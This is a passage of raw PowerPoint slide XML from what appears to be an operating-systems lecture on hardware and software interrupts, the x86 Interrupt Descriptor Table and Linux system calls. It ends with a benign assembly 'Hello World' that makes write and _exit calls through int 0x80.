          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hardware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keyboard pressed, mouse moved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disk says its done </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>writing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software can interrupt, invoke the kernel when something needs to be done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically for hardware I/O, also used to interface directly with the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2310767439"/>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Interrupt Descriptor Table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3107803" cy="4719577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>x86 implementation of an interrupt vector table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Map of kernel functions that handle the interrupt when the CPU is interrupted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3758351" y="1239807"/>
            <a:ext cx="5072878" cy="5440362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2699417240"/>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System calls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3987478" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used to do things that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> programs can’t do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A type of software interrupt: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4988688" y="1683969"/>
            <a:ext cx="3906135" cy="4358424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3012730331"/>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System calls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Five categories:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process control (load, exec, kill/spawn)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File management (write, open, close, create)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Device management (write, read, release)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Info. Maintenance (get/set: time, process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attrs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Communication (send, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>recieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> messages, socket) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2032652302"/>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System calls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4916347"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (implementation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>write(…) is the system call as seen by the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(…) is the system call as implemented by the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function fork, exec are wrappers for system calls in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you browse the kernel source, look in include/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscalls.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, they are defined there.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They are actually implemented throughout the kernel, however (we will see in two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sliedes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626361776"/>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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 0x80 usage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>4, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>; use the write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>1, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>; write to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>; use string "Hello World"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>12, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>; write 12 characters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0x80       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>; make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>1, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>; use the _exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>; error code 0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0x80       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>; make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
